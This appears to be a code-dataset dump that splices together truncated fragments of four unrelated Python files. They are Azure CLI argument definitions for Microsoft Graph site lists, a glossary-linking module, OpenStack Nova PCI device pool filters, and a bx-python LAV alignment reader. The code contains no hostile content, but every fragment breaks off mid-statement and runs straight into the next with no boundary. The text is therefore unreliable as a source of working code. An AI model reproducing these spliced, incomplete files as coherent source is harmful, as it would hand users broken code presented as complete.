input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
the list item.')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Fields')
with self.argument_context('sites siteslist create-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('application_id', type=str, help='Identifier of the application used to create the subscription. '
'Read-only.')
c.argument('change_type', type=str, help='Required. Indicates the type of change in the subscribed resource '
'that will raise a change notification. The supported values are: created, updated, deleted. '
'Multiple values can be combined using a comma-separated list.Note: Drive root item and list change '
'notifications support only the updated changeType. User and group change notifications support '
'updated and deleted changeType.')
c.argument('client_state', type=str, help='Optional. Specifies the value of the clientState property sent by '
'the service in each change notification. The maximum length is 128 characters. The client can '
'check that the change notification came from the service by comparing the value of the clientState '
'property sent with the subscription with the value of the clientState property received with each '
'change notification.')
c.argument('creator_id', type=str, help='Identifier of the user or service principal that created the '
'subscription. If the app used delegated permissions to create the subscription, this field '
'contains the id of the signed-in user the app called on behalf of. If the app used application '
'permissions, this field contains the id of the service principal corresponding to the app. '
'Read-only.')
c.argument('encryption_certificate', type=str, help='A base64-encoded representation of a certificate with a '
'public key used to encrypt resource data in change notifications. Optional. Required when '
'includeResourceData is true.')
c.argument('encryption_certificate_id', type=str, help='A custom app-provided identifier to help identify the '
'certificate needed to decrypt resource data. Optional.')
c.argument('expiration_date_time', help='Required. Specifies the date and time when the webhook subscription '
'expires. The time is in UTC, and can be an amount of time from subscription creation that varies '
'for the resource subscribed to. See the table below for maximum supported subscription length of '
'time.')
c.argument('include_resource_data', arg_type=get_three_state_flag(), help='When set to true, change '
'notifications include resource data (such as content of a chat message). Optional.')
c.argument('latest_supported_tls_version', type=str, help='')
c.argument('lifecycle_notification_url', type=str, help='')
c.argument('notification_url', type=str, help='Required. The URL of the endpoint that will receive the change '
'notifications. This URL must make use of the HTTPS protocol.')
c.argument('resource', type=str, help='Required. Specifies the resource that will be monitored for changes. Do '
'not include the base URL (https://graph.microsoft.com/v1.0/). See the possible resource path '
'values for each supported resource.')
with self.argument_context('sites siteslist delete-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('column_definition_id', type=str, help='key: id of columnDefinition')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('content_type_id', type=str, help='key: id of contentType')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-drive') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-item') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('list_item_id', type=str, help='key: id of listItem')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist delete-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('subscription_id', type=str, help='key: id of subscription', id_part='subscription')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('sites siteslist list-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist list-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist list-item') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist list-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('column_definition_id', type=str, help='key: id of columnDefinition')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('content_type_id', type=str, help='key: id of contentType')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-drive') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-item') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('list_item_id', type=str, help='key: id of listItem')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist show-subscription') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('subscription_id', type=str, help='key: id of subscription', id_part='subscription')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('sites siteslist update-column') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('column_definition_id', type=str, help='key: id of columnDefinition')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('boolean', type=validate_file_or_dict, help='booleanColumn Expected value: '
'json-string/json-file/@json-file.')
c.argument('calculated', action=AddCalculated, nargs='+', help='calculatedColumn')
c.argument('choice', action=AddChoice, nargs='+', help='choiceColumn')
c.argument('column_group', type=str, help='For site columns, the name of the group this column belongs to. '
'Helps organize related columns.')
c.argument('date_time', action=AddDateTime, nargs='+', help='dateTimeColumn')
c.argument('default_value', action=AddDefaultValue, nargs='+', help='defaultColumnValue')
c.argument('description', type=str, help='The user-facing description of the column.')
c.argument('display_name', type=str, help='The user-facing name of the column.')
c.argument('enforce_unique_values', arg_type=get_three_state_flag(), help='If true, no two list items may have '
'the same value for this column.')
c.argument('geolocation', type=validate_file_or_dict, help='geolocationColumn Expected value: '
'json-string/json-file/@json-file.')
c.argument('hidden', arg_type=get_three_state_flag(), help='Specifies whether the column is displayed in the '
'user interface.')
c.argument('indexed', arg_type=get_three_state_flag(), help='Specifies whether the column values can used for '
'sorting and searching.')
c.argument('lookup', action=AddLookup, nargs='+', help='lookupColumn')
c.argument('name', type=str, help='The API-facing name of the column as it appears in the [fields][] on a '
'[listItem][]. For the user-facing name, see displayName.')
c.argument('number', action=AddNumber, nargs='+', help='numberColumn')
c.argument('person_or_group', action=AddPersonOrGroup, nargs='+', help='personOrGroupColumn')
c.argument('read_only', arg_type=get_three_state_flag(), help='Specifies whether the column values can be '
'modified.')
c.argument('required', arg_type=get_three_state_flag(), help='Specifies whether the column value is not '
'optional.')
c.argument('text', action=AddText, nargs='+', help='textColumn')
c.argument('locale', type=str, help='Specifies the locale from which to infer the currency symbol.',
arg_group='Currency')
with self.argument_context('sites siteslist update-content-type') as c:
c.argument('site_id', type=str, help='key: id of site')
c.argument('list_id', type=str, help='key: id of list')
c.argument('content_type_id', type=str, help='key: id of contentType')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('description', type=str, help='The descriptive text for the item.')
c.argument('group', type=str, help='The name of the group this content type belongs to. Helps organize related '
'content types.')
c.argument('hidden', arg_type=get_three_state_flag(), help='Indicates whether the content type is hidden in '
'the list\'s \'New\' menu.')
c.argument('name', type=str, help='The name of the content type.')
c.argument('order', action=AddOrder, nargs='+', help='contentTypeOrder')
c.argument('parent_id', type=str, help='The unique identifier of the content type.')
c.argument('read_only', arg_type=get_three_state_flag(), help='If true, the content type cannot be modified '
'unless this value is first set to false.')
c.argument('sealed', arg_type=get_three_state_flag(), help='If true, the content type cannot be modified by '
'users or through push-down operations. Only site collection administrators can seal or unseal '
'content types.')
c.argument('column_links', action=AddColumnLinks, nargs='+', help='The collection of columns that are required '
'by this content type')
c.argument('drive_id', type=str, help='Unique identifier of the drive instance that contains the item. '
'Read-only.', arg_group='Inherited From')
c.argument('drive_type', type=str, help='Identifies the type of drive. See [drive][] resource for values.',
arg_group='Inherited From')
c.argument('microsoft_graph_item_reference_id', type=str, help='Unique identifier of the item in the drive. '
'Read-only.', arg_group='Inherited From')
c.argument('microsoft_graph_item_reference_name', type=str, help='The name of the item being referenced. '
'Read-only.', arg_group='Inherited From')
c.argument('path', type=str, help='Path | |
import re
from operator import attrgetter
# My files
from args import *
from error import *
from files import *
from find_page import *
from easy import *
from trie import *
from parse import *
from cache import *
glossary_taxon_dict = {}
class Glossary:
pass
def __init__(self, name):
self.name = name
# user-visible name of this glossary's coverage
# (defaults to its top-level taxon)
self.title = None
# name of this glossary's top-level taxon
# (or None, if it includes all taxons)
self.taxon = None
# top page used by this glossary (or None, if it applies to all pages)
self.page = None
self.parent = None # a single parent glossary (or None)
self.child = set() # an unordered set of child glossaries
self.is_jepson = False # changed to True for the Jepson glossary
# changed to True for a glossary that shouldn't appear in the ToC
self.invisible = False
# search_terms is an ordered list of term lists to be written
# to pages.js. The first term in each list is also the anchor.
#
# The anchor and all other terms are unmodified:
# - capitalization is retained for optimal display in auto-complete.
# - easy_sub is not applied because it would confuse search matching.
# (And the original punctuation can match any user punctuation.)
self.search_terms = []
# term_anchor is a mapping from each term to an HTML anchor.
# This is used for creating glossary_regex and also for looking up
# a matched term to get its anchor.
#
# The terms are modified somewhat:
# - terms are lowercase as the canonical form for comparison.
# - easy_sub is applied since that's what the regex will match.
# The anchor remains unmodified:
# - capitalization is retained for optimal display in the URL.
# - easy_sub is not applied because a URL doesn't support special
# HTML characters.
self.term_anchor = {}
# anchor_terms is a mapping from each anchor to a set of terms.
# This is used to exclude those terms within a definition line
# from linking. This is not used for the Jepson glossary
# since we don't create HTML for it.
#
# The anchor remains unmodified as above.
# The terms are modified as above.
self.anchor_terms = {}
# anchor_defined is a mapping from an anchor to the defined term
# as listed in the HTML. This is not used for the Jepson glossary
# since we don't create HTML for it.
#
# The anchor remains unmodified as above.
# The defined term is a string as follows:
# - it includes the anchor and any parenthesized terms that we
# want to display beside it.
# - capitalization is retained for optimal display in the HTML.
# - easy_sub is applied for optimal display in the HTML.
self.anchor_defined = {}
# anchor_list is a list of anchors, in glossary order.
# It is only used with arg -jepson_usage.
self.anchor_list = []
# figure_list is a list of filenames for figures used in the
# glossary page.
self.figure_list = []
def set_parent(self, parent):
self.parent = parent
if parent:
parent.child.add(self)
def get_link_class(self):
if self.is_jepson:
return 'glossary-jepson'
else:
return 'glossary'
def get_filename(self):
no_spaces = re.sub(r' ', '-', self.name)
return filename(no_spaces)
def get_url(self):
if self.is_jepson:
return 'https://ucjeps.berkeley.edu/eflora/glossary.html'
else:
pageurl = url(self.get_filename())
return f'{pageurl}.html'
def create_link(self):
link_class = self.get_link_class()
pageurl = self.get_url()
return f'<a href="{pageurl}" class="{link_class}">{self.name}</a>'
def glossary_link(self, anchor, term):
link_class = self.get_link_class()
pageurl = self.get_url()
anchorurl = url(anchor)
return f'<a class="{link_class}" href="{pageurl}#{anchorurl}">{term}</a>'
def find_dups(self, term):
dup_list = []
# Find ancestors of this glossary that define the same term.
ancestor = self.parent
while ancestor:
if term in ancestor.term_anchor:
link = ancestor.glossary_link(ancestor.term_anchor[term],
ancestor.name)
dup_list.append(link)
ancestor = ancestor.parent
# We built the list of shared ancestors from lowest ancestor to
# highest ancestor, but we want the full dup_list to be from
# highest glossary to lowest.
dup_list.reverse()
for child in sorted(self.child, key=attrgetter('name')):
dup_list.extend(child.find_dups_in_children(term))
return dup_list
def find_dups_in_children(self, term):
dup_list = []
if term in self.term_anchor:
link = self.glossary_link(self.term_anchor[term], self.name)
dup_list.append(link)
for child in sorted(self.child, key=attrgetter('name')):
dup_list.extend(child.find_dups_in_children(term))
return dup_list
# For the given term, get a link within the glossary or its ancestors.
# Search ancestors only when deep=True.
# Return None if the term isn't in the glossary (or its ancestors).
def get_link(self, term, is_glossary, deep, child=None):
lower = term.lower()
if lower in self.link_set:
anchor = self.term_anchor[lower]
if self.is_jepson:
if anchor in self.used_dict:
self.used_dict[anchor] += 1
else:
self.used_dict[anchor] = 1
return self.glossary_link(anchor, term)
elif deep and self.parent:
return self.parent.get_link(term, is_glossary, True, child=self)
else:
return None
def link_glossary_words(self, assoc_name, assoc_page, txt,
is_glossary=False, exclude=None):
# This function is called for a glossary word match.
# Replace the matched word with a link to the primary term
# in the glossary.
def repl_glossary(matchobj):
term = matchobj.group(1)
if '#' in term:
(name, partition, bare_term) = term.partition('#')
if bare_term == '':
# I'd love to print what file this error occured in, but
# that requires an exception or a global variable or passing
# more data around, none of which I like. The user will
# have to grep for the broken reference in the HTML.
error(f'unrecognized glossary cross reference starting with "{name}#" in {assoc_name}')
return f'{name}#broken ref'
elif name == 'none':
# 'none#[term]' means that we don't want a glossary link.
# Discard the 'none#' and return only the bare term.
return bare_term
else:
glossary = glossary_name_dict[name + ' glossary']
link = glossary.get_link(bare_term, is_glossary, False)
if link:
return link
else:
# We didn't find a link for the cross reference, but
# maybe we will if we use a shorter term.
# While keeping the cross-reference marker, cut off
# the end of the term and try glossary substitution
# again.
matchobj = re.match(r'(.*\W)(\w+)$', term)
if matchobj:
term1 = matchobj.group(1)
term2 = matchobj.group(2)
if not term1.endswith('#'):
alt_term = link_safe(term1) + link_safe(term2)
if alt_term != term:
link = alt_term
if link:
return alt_term
else:
error(f'bad glossary cross reference {term}')
return term
# Continue for the default case without a '#' cross-ref.
exclude_term = (exclude and term.lower() in exclude)
if exclude_term:
# Don't make a link for an excluded term. Instead, check
# for potential links in subsets of the term, then default
# to returning the unmodified term.
link = None
else:
link = self.get_link(term, is_glossary, True)
# We can't find a link for the term (or it is excluded,
# so we don't want to make a link for it.) However,
# a subset of the term might match a different glossary
# entry. So separate the last letter and try to link again.
# This will perform the next-highest priority match if
# possible. If nothing changes, instead separate the first
# letter and try to link again. (Note that this doesn't
# catch the case where a match could be made starting
# inside the excluded term and extending beyond its end.
# I doubt that would ever matter, and if it did we'd just
# miss a link. Not a big deal.)
if not link:
matchobj = re.match(r'(.*\W)(\w+)$', term)
if matchobj:
term1 = matchobj.group(1)
term2 = matchobj.group(2)
alt_term = link_safe(term1) + link_safe(term2)
if alt_term != term:
link = alt_term
if not link:
matchobj = re.match(r'(\w+)(\W.*)$', term)
if matchobj:
term1 = matchobj.group(1)
term2 = matchobj.group(2)
alt_term = link_safe(term1) + link_safe(term2)
if alt_term != term:
link = alt_term
if link:
return link
elif exclude_term:
return term
else:
# Term not found in the applicable glossaries.
# Check whether the term is in any of the glossaries for which
# a warning should be printed.
if assoc_page:
for glossary in assoc_page.glossary_warn:
if term.lower() in glossary.link_set:
error(f'{term} in {assoc_name}',
prefix='Glossary term is used outside of its glossary hierarchy:')
break
return term
# Perform glossary substitution on a fragment of "safe text", i.e.
# one without HTML tags | |
this is possible.
"""
request_specs = request.spec
return [
pool for pool in pools
if utils.pci_device_prop_match(pool, request_specs)
]
def _filter_pools_for_numa_cells(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.List[Pool]:
"""Filter out pools with the wrong NUMA affinity, if required.
Exclude pools that do not have *suitable* PCI NUMA affinity.
``numa_policy`` determines what *suitable* means, being one of
PREFERRED (nice-to-have), LEGACY (must-have-if-available) and REQUIRED
(must-have). We iterate through the various policies in order of
strictness. This means that even if we only *prefer* PCI-NUMA affinity,
we will still attempt to provide it if possible.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells.
:returns: A list of pools that can, together, provide at least
``requested_count`` PCI devices with the level of NUMA affinity
required by ``numa_policy``, else all pools that can satisfy this
policy even if it's not enough.
"""
if not numa_cells:
return pools
# we default to the 'legacy' policy for...of course...legacy reasons
requested_policy = fields.PCINUMAAffinityPolicy.LEGACY
if 'numa_policy' in request:
requested_policy = request.numa_policy or requested_policy
requested_count = request.count
numa_cell_ids = [cell.id for cell in numa_cells]
# filter out pools which numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# we can't apply a less strict policy than the one requested, so we
# need to return if we've demanded a NUMA affinity of REQUIRED.
# However, NUMA affinity is a good thing. If we can get enough devices
# with the stricter policy then we will use them.
if requested_policy == fields.PCINUMAAffinityPolicy.REQUIRED or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# the SOCKET policy is a bit of a special case. It's less strict than
# REQUIRED (so REQUIRED will automatically fulfil SOCKET, at least
# with our assumption of never having multiple sockets per NUMA node),
# but not always more strict than LEGACY: a PCI device with no NUMA
# affinity will fulfil LEGACY but not SOCKET. If we have SOCKET,
# process it here and don't continue.
if requested_policy == fields.PCINUMAAffinityPolicy.SOCKET:
return self._filter_pools_for_socket_affinity(pools, numa_cells)
# some systems don't report NUMA node info for PCI devices, in which
# case None is reported in 'pci_device.numa_node'. The LEGACY policy
# allows us to use these devices so we include None in the list of
# suitable NUMA cells.
numa_cell_ids.append(None)
# filter out pools which numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# once again, we can't apply a less strict policy than the one
# requested, so we need to return if we've demanded a NUMA affinity of
# LEGACY. Similarly, we will also return if we have enough devices to
# satisfy this somewhat strict policy.
if requested_policy == fields.PCINUMAAffinityPolicy.LEGACY or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# if we've got here, we're using the PREFERRED policy and weren't able
# to provide anything with stricter affinity. Use whatever devices you
# can, folks.
return sorted(
pools, key=lambda pool: pool.get('numa_node') not in numa_cell_ids)
def _filter_pools_for_socket_affinity(
self,
pools: ty.List[Pool],
numa_cells: ty.List['objects.InstanceNUMACell'],
) -> ty.List[Pool]:
host_cells = self.numa_topology.cells
# bail early if we don't have socket information for all host_cells.
# This could happen if we're running on an weird older system with
# multiple sockets per NUMA node, which is a configuration that we
# explicitly chose not to support.
if any(cell.socket is None for cell in host_cells):
LOG.debug('No socket information in host NUMA cell(s).')
return []
# get a set of host sockets that the guest cells are in. Since guest
# cell IDs map to host cell IDs, we can just lookup the latter's
# socket.
socket_ids = set()
for guest_cell in numa_cells:
for host_cell in host_cells:
if guest_cell.id == host_cell.id:
socket_ids.add(host_cell.socket)
# now get a set of host NUMA nodes that are in the above sockets
allowed_numa_nodes = set()
for host_cell in host_cells:
if host_cell.socket in socket_ids:
allowed_numa_nodes.add(host_cell.id)
# filter out pools that are not in one of the correct host NUMA nodes.
return [
pool for pool in pools if any(
utils.pci_device_prop_match(pool, [{'numa_node': numa_node}])
for numa_node in allowed_numa_nodes
)
]
def _filter_pools_for_unrequested_pfs(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with PFs, unless these are required.
This is necessary in cases where PFs and VFs have the same product_id
and generally useful elsewhere.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.SRIOV_PF
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.SRIOV_PF
]
return pools
def _filter_pools_for_unrequested_vdpa_devices(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with VDPA devices, unless these are required.
This is necessary as vdpa devices require special handling and
should not be allocated to generic pci device requests.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.VDPA
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.VDPA
]
return pools
def _filter_pools_for_unrequested_remote_managed_devices(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with remote_managed devices, unless requested.
Remote-managed devices are not usable for legacy SR-IOV or hardware
offload scenarios and must be excluded from allocation.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(not strutils.bool_from_string(spec.get(PCI_REMOTE_MANAGED_TAG))
for spec in request.spec):
pools = [pool for pool in pools
if not strutils.bool_from_string(
pool.get(PCI_REMOTE_MANAGED_TAG))]
return pools
def _filter_pools(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.Optional[ty.List[Pool]]:
"""Determine if an individual PCI request can be met.
Filter pools, which are collections of devices with similar traits, to
identify those that can support the provided PCI request.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``request.numa_policy``.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACell objects.
:returns: A list of pools that can be used to support the request if
this is possible, else None.
"""
# NOTE(vladikr): This code may be open to race conditions.
# Two concurrent requests may succeed when called support_requests
# because this method does not remove related devices from the pools
# Firstly, let's exclude all devices that don't match our spec (e.g.
# they've got different PCI IDs or something)
before_count = sum([pool['count'] for pool in pools])
pools = self._filter_pools_for_spec(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) due to mismatched PCI attribute(s)',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# Next, let's exclude all devices that aren't on the correct NUMA node
# or | |
<gh_stars>1-10
"""
Support for reading and writing the LAV format produced by the `blastz`_
pairwise aligner.
.. _blastz: http://www.bx.psu.edu/miller_lab/
"""
from bx.align import *
import bx.seq
import sys,math,StringIO
import itertools
from bx import interval_index_file
class Reader(object):
"""Iterate over all lav blocks in a file in order"""
def __init__(self,file,path_subs=None,fail_to_ns=False):
self.file = file
self.lineNumber = 0
self.path_subs = path_subs # list of (prefix,replacement) to allow
if (self.path_subs == None): # .. redirection of sequence file paths
self.path_subs = [] # .. on different machines
self.fail_to_ns = fail_to_ns # True => if sequences fail to open,
# create a fake file of all Ns
self.d_stanza_text = None
self.seq1_filename = None
self.seq1_file = None
self.seq1_header = None
self.seq1_start = None
self.seq1_end = None
self.seq1_strand = None
self.seq1_contig = None
self.seq1_src = None
self.seq1_gap = None
self.seq2_filename = None
self.seq2_file = None
self.seq2_header = None
self.seq2_start = None
self.seq2_end = None
self.seq2_strand = None
self.seq2_contig = None
self.seq2_src = None
self.seq2_gap = None
def next(self):
while (True):
line = self.fetch_line(strip=None,requireLine=False)
assert (line), "unexpected end of file (missing #:eof)"
line = line.rstrip()
if (line == ""): # (allow blank lines between stanzas)
continue
if (line == "#:eof"):
line = self.file.readline().rstrip()
assert (not line), "extra line after #:eof (line %d, \"%s\")" \
% (self.lineNumber,line)
return None
if (line == "#:lav"):
continue
if (line.startswith("d {")):
self.d_stanza_text = self.parse_unknown_stanza()
continue
if (line.startswith("s {")):
self.parse_s_stanza()
continue
if (line.startswith("h {")):
self.parse_h_stanza()
continue
if (line.startswith("a {")):
(score,pieces) = self.parse_a_stanza()
break
if (line.endswith("{")):
self.parse_unknown_stanza()
continue
assert (False), "incomprehensible line (line %d, \"%s\")" \
% (self.lineNumber,line)
return self.build_alignment(score,pieces)
def __iter__(self):
return ReaderIter(self)
def close(self):
self.file.close()
def open_seqs(self):
if (self.seq1_file != None) and (self.seq2_file != None):
return
if (self.seq1_file == None):
if (self.seq1_strand == "+"): revcomp = False
else: revcomp = "-5'"
if (self.seq1_contig == 1): contig = None
else: contig = self.seq1_contig
try:
f = file(self.seq1_filename,"rb")
except:
if (self.fail_to_ns):
f = StringIO.StringIO(">seq1\n" + ("n" * (self.seq1_end - self.seq1_start)))
revcomp = False
contig = 1
else:
assert (False), "failed to open %s" % self.seq1_filename
self.seq1_file = bx.seq.seq_file(f,revcomp=revcomp,contig=contig)
self.seq1_gap = self.seq1_file.gap
try:
name1 = self.header_to_src_name(self.seq1_header)
except ValueError:
try:
name1 = self.path_to_src_name(self.seq1_filename)
except ValueError:
name1 = "seq1"
(species1,chrom1) = src_split(name1)
self.seq1_src = src_merge(species1,chrom1,contig)
if (contig != None): chrom1 += "[%s]" % contig
if (self.seq2_file == None):
if (self.seq2_strand == "+"): revcomp = False
else: revcomp = "-5'"
if (self.seq2_contig == 1): contig = None
else: contig = self.seq2_contig
try:
f = file(self.seq2_filename,"rb")
except:
if (self.fail_to_ns):
f = StringIO.StringIO(">seq2\n" + ("n" * (self.seq2_end - self.seq2_start)))
revcomp = False
contig = 1
else:
assert (False), "failed to open %s" % self.seq1_filename
self.seq2_file = bx.seq.seq_file(f,revcomp=revcomp,contig=contig)
self.seq2_gap = self.seq2_file.gap
try:
name2 = self.header_to_src_name(self.seq2_header)
except ValueError:
try:
name2 = self.path_to_src_name(self.seq2_filename)
except ValueError:
name2 = "seq2"
(species2,chrom2) = src_split(name2)
self.seq2_src = src_merge(species2,chrom2,contig)
if (contig != None): chrom2 += "[%s]" % contig
length1 = self.seq1_file.length
length2 = self.seq2_file.length
assert (species1 != species2) or (chrom1 != chrom2) or (length1 == length2), \
"conflicting lengths for %s (%d and %d)" % (self.seq1_src,length1,length2)
self.species_to_lengths = {}
self.species_to_lengths[species1] = {}
self.species_to_lengths[species2] = {} # (OK if it clobbers line above)
self.species_to_lengths[species1][chrom1] = self.seq1_file.length
self.species_to_lengths[species2][chrom2] = self.seq2_file.length
def close_seqs(self):
if (self.seq1_file != None):
self.seq1_file.close()
self.seq1_file = None
if (self.seq2_file != None):
self.seq2_file.close()
self.seq2_file = None
def parse_s_stanza(self):
self.close_seqs()
line = self.fetch_line(report=" in s-stanza")
(self.seq1_filename,
self.seq1_start,
self.seq1_end,
self.seq1_strand,
self.seq1_contig) = self.parse_s_seq(line)
line = self.fetch_line(report=" in s-stanza")
(self.seq2_filename,
self.seq2_start,
self.seq2_end,
self.seq2_strand,
self.seq2_contig) = self.parse_s_seq(line)
line = self.fetch_line(report=" in s-stanza")
assert (line == "}"), "improper s-stanza terminator (line %d, \"%s\")" \
% (self.lineNumber,line)
def parse_s_seq(self,line):
fields = line.split()
filename = fields[0].strip('"')
start = int(fields[1]) - 1
end = int(fields[2])
contig = int(fields[4])
if (fields[3] == "1"): strand = "-"
else: strand = "+"
if (filename.endswith("-")):
assert (strand == "-"), "strand mismatch in \"%s\"" % line
filename = filename[:-1]
filename = do_path_subs(filename,self.path_subs)
return (filename,start,end,strand,contig)
def parse_h_stanza(self):
line = self.fetch_line(strip='"',report=" in h-stanza")
self.seq1_header = line
self.seq1_header_prefix = ""
if (line.startswith(">")):
self.seq1_header = line[1:].strip()
self.seq1_header_prefix = ">"
self.seq1_header = self.seq1_header.split(None,1)
if (len(self.seq1_header) > 0): self.seq1_header = self.seq1_header[0]
else: self.seq1_header = "seq1"
line = self.fetch_line(strip='"',report=" in h-stanza")
self.seq2_header = line
self.seq2_header_prefix = ""
if (line.startswith(">")):
self.seq2_header = line[1:].strip()
self.seq2_header_prefix = ">"
self.seq2_header = self.seq2_header.split(None,1)
if (len(self.seq2_header) > 0): self.seq2_header = self.seq2_header[0]
else: self.seq2_header = "seq2"
line = self.fetch_line(report=" in h-stanza")
assert (line == "}"), "improper h-stanza terminator (line %d, \"%s\")" \
% (self.lineNumber,line)
def parse_a_stanza(self):
"""returns the pair (score,pieces)
where pieces is a list of ungapped segments (start1,start2,length,pctId)
with start1,start2 origin-0"""
# 's' line -- score, 1 field
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
assert (fields[0] == "s"), "s line expected in a-stanza (line %d, \"%s\")" \
% (self.lineNumber,line)
try: score = int(fields[1])
except: score = float(fields[1])
# 'b' line -- begin positions in seqs, 2 fields
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
assert (fields[0] == "b"), "b line expected in a-stanza (line %d, \"%s\")" \
% (self.lineNumber,line)
beg1 = int(fields[1]) - 1
beg2 = int(fields[2]) - 1
# 'e' line -- end positions in seqs, 2 fields
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
assert (fields[0] == "e"), "e line expected in a-stanza (line %d, \"%s\")" \
% (self.lineNumber,line)
len1 = int(fields[1]) - beg1
len2 = int(fields[2]) - beg2
# 'l' lines
pieces = []
while (True):
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
if (fields[0] != "l"):
break
start1 = int(fields[1]) - 1
start2 = int(fields[2]) - 1
length = int(fields[3]) - start1
length2 = int(fields[4]) - start2
try: pctId = int(fields[5])
